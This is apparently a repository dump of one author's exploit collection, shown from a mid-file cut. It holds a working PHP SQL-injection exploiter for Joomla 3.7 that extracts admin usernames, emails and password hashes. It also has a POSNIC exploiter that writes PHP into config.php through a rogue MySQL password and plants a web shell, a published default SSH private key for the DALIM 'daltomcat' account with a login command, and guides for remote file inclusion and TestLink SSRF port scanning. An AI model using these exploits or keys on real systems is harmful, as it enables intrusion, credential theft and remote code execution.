1889 | 1890 | 1891 | <% 1892 | } 1893 | %> 1894 | -------------------------------------------------------------------------------- /Apache-Tomcat-Text_interface-shell-upload/s.jsp: -------------------------------------------------------------------------------- 1 | test 2 | -------------------------------------------------------------------------------- /Apache-Tomcat-Text_interface-shell-upload/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/Apache-Tomcat-Text_interface-shell-upload/screenshot.png -------------------------------------------------------------------------------- /Apache-Tomcat-Text_interface-shell-upload/sh3lls.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/Apache-Tomcat-Text_interface-shell-upload/sh3lls.war -------------------------------------------------------------------------------- /DALIM-Software-web-applications_server/README.md: -------------------------------------------------------------------------------- 1 | ## Pre-defined SSH Private key for user daltomcat 2 | 3 | ### Summery 4 |
5 | 6 | The DALIM Software web applications software stack ships with pre-defined SSH private key for user `daltomcat` 7 | 8 | When this software stack is installed on a Linux server, it creates a Linux user with below mentioned configuration (in /etc/passwd file): 9 | 10 | `daltomcat:x:****:****:DALiM Tomcat Admin:/home/daltomcat:/bin/bash` 11 | 12 | #### Abuse case 13 | 14 | An attacker can SSH as user `daltomcat` to a Linux server in which DALIM Software web applications software stack is installed. 15 | 16 | To exploit the issue, save below mentioned SSH private key to your machine, chmod it's permission to 400 and SSH to target machine using below menitoned command: 17 | 18 | `ssh daltomcat@Server_IP -i id_rsa` 19 | 20 | ![POC](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/DALIM-Software-web-applications_server/dal_exploit.png) 21 | 22 | #### SSH private key content 23 | 24 | Below mentioned is the SSH private key for user account `daltomcat`: 25 | 26 | ``` 27 | -----BEGIN RSA PRIVATE KEY----- 28 | MIIEogIBAAKCAQEA28TZ+bYr2OIn4apSrM6Q9qPhWgkOokwyD/VadnMIordEX8he 29 | 36wLJFGyIzg7kWc/zbJ89CutJl6bteC0Tzv6bxl9wCNs1rEpW/eR4wDQRhUpc+pQ 30 | KlSIhfJa0NOwlgFhol7CR+Hk/9H87pUlNh7vcY7sNH9uRG+CPdX9yuJKP1NZucF2 31 | FKNaU2PhytlJl7/xJGsy69wsMFMxEfKhtZgTZN5sK+RbzNxuvJgwj3DmXusalksO 32 | rpPf1DufqfRT2UvccdwyMh7Gun4CHU7TM8b4hkQO9NmOHI3GvSLcEtJv1lMQ7fLT 33 | /1ocfR3BjVuB24gmGL54ODn+v9Dv7TI9sCay2QIBIwKCAQBLWW9OTRZY/RT86fB1 34 | wypjMN+MlWQaY0RdPi2k9D15neuOjddioWLn4X7ngP56/tQMAq5/mfI5Cn6HgD3S 35 | Be92jGWg9jPx1ldSu0f2DuhSiumkFdJXp/RLLoWJbSaZ1JaA0AgYpTiSOV4IqCoD 36 | 7Vlow0mrmWeib1/ar8S6lrpe2hzd5VrhmjuXd/S4t/P6yczfyjxU7wAqMPVJ5wJ9 37 | XSWBaWwXnCt4FoLRIrFZeJzFvYLea+j0esYCd1uSe1e8wDQXlCjNENE28dgZWYKh 38 | WJLTtvi80YaJeHLKUix4ZiNzf3oOW6SvScQsMKKBRbhXJz3ohk6F+Xlxei9Umhp0 39 | k9WLAoGBAPgRo+8gOcbB+VjKvFGYJb1UupgZWC+lSVDNSZrLChypfSuYMjFGa4qv 40 | UzzeRnLL8/CawuLuDjK9hsxndGx0/WUawCe1CYmlGJXgFNOe9tIN8yxVsA8axy6+ 41 | GWh0Vb96XsusrEFqCIi0JcS0dWV5xq9KvocuEwuGvQfDGZ2EBudpAoGBAOLLleiN 42 | EmXCTKnlWcW5eEjtosAwIDwP+xTXxz+nk56smG/5gAES2eaAn8PBiqpSORbyzW73 43 | dOuPg12B7XzTHd9nq+jRpDA1JAtIn5fo4yTkJeJ4cQvw0fPbmcc/Usj1wHaXZfJA 44 | umzyv3g1MBgOOaznzYwDZKZYxN4eAdMCxfHxAoGAHFnJl6vpWIsycIwyx38aQYYG 45 | skwKFBLjzrhgLvKiEed8BPtzc1iBUa2jHOYz79zLa/RuC05oBcyEbyHEKab4Y1OD 46 | rMQ7mrPIS6SUqniRPJPhRuU4sUTjkFA9awX7K9N4jE4/knKEoeiz2/dd37YlVdyo 47 | D3L63L7xCDON5h23pWsCgYEAz1sMt1xol40S5HnrrXZfWJ7Ar7b45nUC0TpPxSt/ 48 | pwQzmZOoO37zG+NQPfLH7C3rDarKdBVyNnSVXM6P/RjK2uJxSeQ+V/YSU3WZOm6G 49 | iCEMsc00KCyisxHrrtrPWKYsTytV5M13PwnToRqvoPcQKQ5yySesetTRQBtvYdam 50 | WYsCgYEAkuxFor2DGF05bUSLgLKFj2hJ7ZQwkxIXOU/MKt52spL+KHGc/LuCq9Jv 51 | y43P5UdThFyuS10NBe7iHmbaoLEaRxlO9M38vMIldHDm2nAeQ5AwVVeSEWoSsm2O 52 | 0Waof8fgaW21AMhqudoU1pAvfBNGah7SiKqP/yXjaceWTpSALb0= 53 | -----END RSA PRIVATE KEY----- 54 | ``` 55 | 56 | 57 | -------------------------------------------------------------------------------- /DALIM-Software-web-applications_server/dal_exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/DALIM-Software-web-applications_server/dal_exploit.png -------------------------------------------------------------------------------- /DALIM-Software-web-applications_server/id_rsa: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEogIBAAKCAQEA28TZ+bYr2OIn4apSrM6Q9qPhWgkOokwyD/VadnMIordEX8he 3 | 36wLJFGyIzg7kWc/zbJ89CutJl6bteC0Tzv6bxl9wCNs1rEpW/eR4wDQRhUpc+pQ 4 | KlSIhfJa0NOwlgFhol7CR+Hk/9H87pUlNh7vcY7sNH9uRG+CPdX9yuJKP1NZucF2 5 | FKNaU2PhytlJl7/xJGsy69wsMFMxEfKhtZgTZN5sK+RbzNxuvJgwj3DmXusalksO 6 | rpPf1DufqfRT2UvccdwyMh7Gun4CHU7TM8b4hkQO9NmOHI3GvSLcEtJv1lMQ7fLT 7 | /1ocfR3BjVuB24gmGL54ODn+v9Dv7TI9sCay2QIBIwKCAQBLWW9OTRZY/RT86fB1 8 | wypjMN+MlWQaY0RdPi2k9D15neuOjddioWLn4X7ngP56/tQMAq5/mfI5Cn6HgD3S 9 | Be92jGWg9jPx1ldSu0f2DuhSiumkFdJXp/RLLoWJbSaZ1JaA0AgYpTiSOV4IqCoD 10 | 7Vlow0mrmWeib1/ar8S6lrpe2hzd5VrhmjuXd/S4t/P6yczfyjxU7wAqMPVJ5wJ9 11 | XSWBaWwXnCt4FoLRIrFZeJzFvYLea+j0esYCd1uSe1e8wDQXlCjNENE28dgZWYKh 12 | WJLTtvi80YaJeHLKUix4ZiNzf3oOW6SvScQsMKKBRbhXJz3ohk6F+Xlxei9Umhp0 13 | k9WLAoGBAPgRo+8gOcbB+VjKvFGYJb1UupgZWC+lSVDNSZrLChypfSuYMjFGa4qv 14 | UzzeRnLL8/CawuLuDjK9hsxndGx0/WUawCe1CYmlGJXgFNOe9tIN8yxVsA8axy6+ 15 | GWh0Vb96XsusrEFqCIi0JcS0dWV5xq9KvocuEwuGvQfDGZ2EBudpAoGBAOLLleiN 16 | EmXCTKnlWcW5eEjtosAwIDwP+xTXxz+nk56smG/5gAES2eaAn8PBiqpSORbyzW73 17 | dOuPg12B7XzTHd9nq+jRpDA1JAtIn5fo4yTkJeJ4cQvw0fPbmcc/Usj1wHaXZfJA 18 | umzyv3g1MBgOOaznzYwDZKZYxN4eAdMCxfHxAoGAHFnJl6vpWIsycIwyx38aQYYG 19 | skwKFBLjzrhgLvKiEed8BPtzc1iBUa2jHOYz79zLa/RuC05oBcyEbyHEKab4Y1OD 20 | rMQ7mrPIS6SUqniRPJPhRuU4sUTjkFA9awX7K9N4jE4/knKEoeiz2/dd37YlVdyo 21 | D3L63L7xCDON5h23pWsCgYEAz1sMt1xol40S5HnrrXZfWJ7Ar7b45nUC0TpPxSt/ 22 | pwQzmZOoO37zG+NQPfLH7C3rDarKdBVyNnSVXM6P/RjK2uJxSeQ+V/YSU3WZOm6G 23 | iCEMsc00KCyisxHrrtrPWKYsTytV5M13PwnToRqvoPcQKQ5yySesetTRQBtvYdam 24 | WYsCgYEAkuxFor2DGF05bUSLgLKFj2hJ7ZQwkxIXOU/MKt52spL+KHGc/LuCq9Jv 25 | y43P5UdThFyuS10NBe7iHmbaoLEaRxlO9M38vMIldHDm2nAeQ5AwVVeSEWoSsm2O 26 | 0Waof8fgaW21AMhqudoU1pAvfBNGah7SiKqP/yXjaceWTpSALb0= 27 | -----END RSA PRIVATE KEY----- 28 | -------------------------------------------------------------------------------- /Joomla-SQL-Injection-3.7/3xpl0173r.php: -------------------------------------------------------------------------------- 1 | 8 | 9 | 10 | 11 | --==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==-- 12 | 13 | 92 | 103 | '; 104 | echo $head ; 105 | echo ' 106 | 107 | 108 |
109 | --==[[ Mannu ]]==--
--==[[ Joomla SQL Injection exploiter By Team INDIShEll]]==--
110 |
113 | 114 | ####################################################################################################################################
115 | -==[[Greetz to]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, 116 |
Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, 117 | Hackuin,Alicks,mike waals
cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256 118 | Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
119 | --==[[Love to]]==--
My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP 120 | Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
121 | --==[[Interface Desgined By]]==--
GCE College ke DON :D
122 | 123 | 124 | #################################################################################################################################### 125 | 126 |
127 | 128 | '; 129 | 130 | 131 | function unhex($hex){ 132 | for($i=0;$i 153 | 154 |
155 | 156 | --==[[ code for India ]]==-- 157 | 158 |

159 |
160 | 161 | 162 |
163 | 164 | '.$table_name; 183 | echo '
'; 184 | 185 | $prefix=explode('_',$table_name); 186 | $total_char=10; 187 | $start=1; 188 | $loop_end=false; 189 | 190 | 191 | while($loop_end!=true) 192 | { 193 | 194 | 195 | 196 | $payload2='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(password,'.$start.','.$total_char.'),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1'; 197 | $final_url=$inject.$payload2; 198 | 199 | $data_extracted=data($final_url); 200 | $de0=explode("~~~", $data_extracted); 201 | $de1=explode("~~~", $de0[1]); 202 | $ddd.=trim($de1[0]); 203 | if(trim($de1[0])=='') 204 | { 205 | break; 206 | $loop_end=true; 207 | 208 | } 209 | $i=$i+1; 210 | $start=$start+10; 211 | 212 | } 213 | 214 | 215 | $username='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(username,1,20),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1'; 216 | $final_url=$inject.$username; 217 | $data_extracted=data($final_url); 218 | $de0=explode("~~~", $data_extracted); 219 | $de1=explode("~~~", $de0[1]); 220 | $user_name=trim($de1[0]); 221 | 222 | $email='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(email,1,20),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1'; 223 | $final_url=$inject.$email; 224 | $data_extracted=data($final_url); 225 | $de0=explode("~~~", $data_extracted); 226 | $de1=explode("~~~", $de0[1]); 227 | $email=trim($de1[0]); 228 | 229 | $dbuser='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(user(),1,20),0x7e7e7e))))=1'; 230 | $final_url=$inject.$dbuser; 231 | $data_extracted=data($final_url); 232 | $de0=explode("~~~", $data_extracted); 233 | $de1=explode("~~~", $de0[1]); 234 | $db_user=trim($de1[0]); 235 | 236 | $dbname='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(database(),1,20),0x7e7e7e))))=1'; 237 | $final_url=$inject.$dbname; 238 | $data_extracted=data($final_url); 239 | $de0=explode("~~~", $data_extracted); 240 | $de1=explode("~~~", $de0[1]); 241 | $db_name=trim($de1[0]); 242 | 243 | $dbversion='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(version(),1,20),0x7e7e7e))))=1'; 244 | $final_url=$inject.$dbversion; 245 | $data_extracted=data($final_url); 246 | $de0=explode("~~~", $data_extracted); 247 | $de1=explode("~~~", $de0[1]); 248 | $db_version=trim($de1[0]); 249 | 250 | 251 | if($email!='' || $user_name!='' || $ddd!='') 252 | { 253 | echo 'Target '.$target.' has been injected successfully, find username, email and password given below

'; 254 | 255 | echo ''; 256 | echo ''; 258 | echo ''; 260 | echo ''; 262 | echo ''; 264 | echo ''; 266 | echo '
Database username is -> '.$db_user; 257 | echo '
Database name is -> '.$db_name; 259 | echo '
Database version is -> '.$db_version; 261 | echo '
Username is -> '.$user_name; 263 | echo '
Email is -> '.$email; 265 | echo '
Password hash is -> '.$ddd; 267 | echo '
'; 268 | } 269 | 270 | 271 | 272 | } 273 | 274 | 275 | 276 | ?> 277 | -------------------------------------------------------------------------------- /Joomla-SQL-Injection-3.7/README.md: -------------------------------------------------------------------------------- 1 | This PHP script exploit SQL Injection vulnerability in Joomla 3.7. 2 | 3 | To use this script, system must have PHP installed on it. 4 | This script basically craft HTTP request using PHP-CURL. 5 | 6 | 7 | 8 | Just type target domain which is having joomla installation 3.7. 9 | 10 | --==[[Greetz to]]==-- 11 | 12 | Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,ethicalnoob Indishell,Local root indishell,Irfninja indishell, Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Gujjar PCP,Bikash,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,shafoon, Rehan manzoor, cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk, D2 and rest of TEAM INDISHELL 13 | 14 | --==[[Love to]]==-- 15 | 16 | My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP,rafay baloch, D3, Nag256, Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik) 17 | -------------------------------------------------------------------------------- /Joomla-SQL-Injection-3.7/SQL Injection joomla.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/Joomla-SQL-Injection-3.7/SQL Injection joomla.png -------------------------------------------------------------------------------- /MSSQL Error-Based SQL Injection Order by clause/Error based SQL Injection in “Order By” clause (MSSQL).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/MSSQL Error-Based SQL Injection Order by clause/Error based SQL Injection in “Order By” clause (MSSQL).pdf -------------------------------------------------------------------------------- /MSSQL Error-Based SQL Injection Order by clause/README.md: -------------------------------------------------------------------------------- 1 | 2 | This paper is about exploiting Error based SQL Injection in "Order By" Clause. 3 | -------------------------------------------------------------------------------- /POSNIC/SQL-Injection.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/POSNIC/SQL-Injection.php -------------------------------------------------------------------------------- /POSNIC/posnic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/POSNIC/posnic.png -------------------------------------------------------------------------------- /POSNIC/posnic_exploit_code.php: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | --==[[IndiSh3LL]]==-- 8 | 9 | 10 | 94 | '; 95 | 96 | 97 | 98 | echo $head ; 99 | echo ' 100 | 101 | 102 | 103 | 104 | 105 |
106 | --==[[ POSNIC, PHP stock management script Remote code execution exploiter ]==--
--==[[ With Love from Team Indishell]]==--
107 | 108 |
111 | 112 | ####################################################################################################################################
113 | --==[[Greetz to]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,ethicalnoob Indishell,Local root indishell,Irfninja indishell
Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Gujjar PCP,Bikash,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA
cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL
114 | --==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP, 115 | Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
116 | --==[[Interface Desgined By]]==--
GCE College ke DON :D
117 | 118 | 119 | #################################################################################################################################### 120 | 121 |
122 | 123 | 124 | '; 125 | 126 | echo '
127 | --==[[ code for India,Hack for India,Die for India ]]==-- 128 |
Please Read it before using this code.

129 |
130 | target URL: - 131 |

Attacker controled Remote MySQL host: - 132 |

Attacker controled Remote MySQL account username: - 133 |

134 | 135 |
'; 136 | 137 | 138 | 139 | function request($lu,$payload) 140 | { 141 | $ch = curl_init(); 142 | curl_setopt($ch, CURLOPT_URL, $lu); 143 | curl_setopt($ch, CURLOPT_HEADER, 0); 144 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 145 | curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); 146 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 147 | curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); 148 | curl_setopt ($ch, CURLOPT_POST, 1); 149 | curl_setopt ($ch, CURLOPT_POSTFIELDS, "$payload"); 150 | curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); 151 | curl_exec ($ch); 152 | curl_close ($ch); 153 | } 154 | 155 | function shell_check($url) { 156 | $curl = curl_init($url); 157 | curl_setopt($curl, CURLOPT_NOBODY, true); 158 | $result = curl_exec($curl); 159 | $ret = false; 160 | if ($result !== false) { 161 | $statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE); 162 | if ($statusCode == 200) { 163 | $ret = true; 164 | } 165 | } 166 | curl_close($curl); 167 | return $ret; 168 | } 169 | 170 | 171 | function access($lu) 172 | { 173 | $ch = curl_init(); 174 | 175 | curl_setopt($ch, CURLOPT_URL, $lu); 176 | curl_setopt($ch, CURLOPT_HEADER, 0); 177 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 178 | curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); 179 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 180 | curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); 181 | $result['EXE'] = curl_exec($ch); 182 | curl_close($ch); 183 | return $result['EXE']; 184 | 185 | } 186 | 187 | 188 | if(isset($_POST['launch'])) 189 | { 190 | 191 | $tar=$_POST['tar']; 192 | $mhost=trim($_POST['mhost']); 193 | $muser=trim($_POST['muser']); 194 | 195 | 196 | $injecturl=$tar.'/setup_page.php'; 197 | $exploiturl=$tar.'/config.php'; 198 | 199 | 200 | 201 | ///////////////////////////////////// 202 | //here, we are injecting config file 203 | ///////////////////////////////////// 204 | $hex_it="select[]=1&select_box=owned&host=$mhost&username=$muser&password=\";file_put_contents(\$_POST[2],\$_POST[3]);//&dummy=1&submit=INSTALL"; 205 | request($injecturl,$hex_it); 206 | 207 | ///////////////////////////////////////// 208 | ///Her we go, let's dump shell on server 209 | //////////////////////////////////////// 210 | $code=''; 230 | $post_request='2=mannu.php&3='.$code; 231 | request($exploiturl,$post_request); 232 | access($tar.'/mannu.php'); 233 | $shell_link=shell_check($tar.'/ica.php'); 234 | if($shell_link==True) 235 | { 236 | echo 'check your shell at This link '; 237 | } 238 | 239 | } 240 | 241 | 242 | ?> -------------------------------------------------------------------------------- /POSNIC/readme.md: -------------------------------------------------------------------------------- 1 | This script exploit remote code execution issue in POSNIC PHP stock management script. 2 | Vulnerability is in setup_page.php code. If CMS has been installed, still setup_page.php code allow user to reinstall CMS. 3 | 4 | 5 | 6 | 7 | During installation process, script first try to connect MySQL server (supplied by user during installation phase), if script is able to connect to MySQL server (locally or remotly hosted), process of CMS installation goes further. 8 | 9 | Script save MySQL server host, username and password in config.php file. 10 | 11 | Here attacker can take advantage of this process to write PHP code in config.php file. 12 | 13 | To do this, attacker need to setup MySQL server on a machine and MySQL server must be configure to accept connection from remote IP (which can be done easily by changing parameter in my.cnf file). 14 | 15 | To configure MySQL server open to remote connection, just open my.cnf file and do below mentioned steps 16 | 17 | -> comment out skip-networking as well as bind-address (if any present in my.cnf )i.e change line 18 | 19 | skip-networking 20 | to 21 | # skip-networking 22 | 23 | and 24 | 25 | bind-address = some_ip 26 | to 27 | #bind-address = some_ip 28 | 29 | save the my.cnf file. reload/restart MySQL server and your mysql server will accept remote connection from any remote IP 30 | 31 | Now, you need to create a MySQL user and database, follow these steps otherwise script won't be able to connect to MySQL server. 32 | 33 | create database in MySQL server by issuing following command. 34 | 35 | create database owned; 36 | 37 | Once database has been created, we need to create a user account which must follow these conditions. 38 | 39 | user acount = whatever you want 40 | 41 | i am going to use user account name as 'owned' 42 | 43 | user account password = ";file_put_contents($_POST[2],$_POST[3]);// 44 | 45 | host from which this user will be allowed = % 46 | 47 | lets suppose, server where posnic script is installed is having IP 192.168.56.102 48 | 49 | so MySQL server command which create user account 50 | 51 | 52 | grant all on database_name.* to username_of_user@% IDENTIFIED BY 'user account password'; 53 | 54 | in my case, here 55 | 56 | database_name = owned 57 | 58 | user account name = owned 59 | 60 | user account password= ";file_put_contents($_POST[2],$_POST[3]);// 61 | 62 | final command will be like this 63 | 64 | grant all on owned.* to owned@% IDENTIFIED BY '";file_put_contents($_POST[2],$_POST[3]);//'; 65 | 66 | after creating user account successfully, Run exploit code on your machine, fill the information 67 | like 68 | 69 | -> target URL i.e Path to POSNIC script (in my case its http://127.0.0.1/stock/) 70 | -> Attacker controlled MySQL host IP (IP of the server where attacker has configured MySQL server) 71 | -> user account name of the attacker controlled MySQL Server (in my case, it was 'owned') 72 | 73 | --==[[ Greetz To ]]==-- 74 | 75 | Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, 76 | Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, 77 | Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256 78 | Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash 79 | 80 | --==[[Love to]]==-- 81 | 82 | My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP 83 | Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik) 84 | 85 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # exploit-code-by-me 2 | This repository contains exploit codes which i developed for exploiting vulnerability issues in different-2 scripts 3 | -------------------------------------------------------------------------------- /RFI-PHP-SMB_server/README.md: -------------------------------------------------------------------------------- 1 | 2 | # Configure SAMBA Server with anonymous browse access 3 | 4 | -> Install SAMB server using below mentioned command: 5 | 6 | apt-get install samba 7 | 8 | -> Create a SMB share directory (in my case /var/www/html/pub/) 9 | 10 | mkdir /var/www/html/pub/ 11 | 12 | -> Configure permissions on newly created SMB share directory: 13 | 14 | chmod 0555 /var/www/html/pub/ 15 | chown -R nobody:nogroup /var/www/html/pub/ 16 | 17 | Run below mentioned command to remove default content of SAMBA server cofig file 18 | 19 | echo > /etc/samba/smb.conf 20 | 21 | -> Put below mentioned content in file '/etc/samba/smb.conf' 22 | 23 | [global] 24 | workgroup = WORKGROUP 25 | server string = Samba Server %v 26 | netbios name = indishell-lab 27 | security = user 28 | map to guest = bad user 29 | name resolve order = bcast host 30 | dns proxy = no 31 | bind interfaces only = yes 32 | 33 | [ica] 34 | path = /var/www/html/pub 35 | writable = no 36 | guest ok = yes 37 | guest only = yes 38 | read only = yes 39 | directory mode = 0555 40 | force user = nobody 41 | 42 | Now, restart SAMBA server to apply new configuration spcified in config file /etc/samba/smb.conf 43 | 44 | service smbd restart 45 | 46 | -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/1 (Request to local machine open port).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/1 (Request to local machine open port).png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/2 (Request to local machine closed port).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/2 (Request to local machine closed port).png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/3 (Internal IP server and request to open port).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/3 (Internal IP server and request to open port).png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/4 (Internal IP with open port).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/4 (Internal IP with open port).png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/5 (Internal IP with closed Port).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/5 (Internal IP with closed Port).png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/6 (Non-existing Internal IP).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/6 (Non-existing Internal IP).png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/README.md: -------------------------------------------------------------------------------- 1 | These are few POCs for the reproducing vulnerability manually. 2 | -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/script1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/script1.png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/script2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink (version <= 1.9.19) Server Side Request Forgery/POCs/script2.png -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # TestLink (version <= 1.9.19) Server Side Request Forgery 4 | 5 | 6 | TestLink (version <= 1.9.19) is vulnerable to Un-Autheticated Server-Side Request Forgery (SSRF) which allow an attacker to perform Network device Port 7 | scanning. Device may be the same which is hosting Testlink code or it may be connected to the same network. 8 | This issue exists in script "install/installNewDB.php" and affected parameter is "databasehost". 9 | 10 | This issue exists in script "install/installNewDB.php" and affected parameter is "databasehost". 11 | There is one interesting thing about TestLink is, any user can access "install/installNewDB.php" web page and can perform Re-Installation by specifying valid Remote MySQL server credentials. This is strange behaviour because generally CMSs or other self-installing script does not allow user to do so if it is connected to a database having content in it. 12 | Now, attacker can take advantage of this behaviour. Attacker just need to intercept the POST method HTTP request in which TesLink is trying to connect to remote/local SQL server. 13 | 14 | Script behaviour to enumerate open or closed port 15 | ================================================= 16 | In the HTTP request, we have HTTP POST method parameter "databasehost" which actually contains the "localhost" or remote_IP value. But if we change the value to "localhost:port" or "internal_IP:port" or "external_IP:port", script try to connect to the server on the port specified. For example, value is 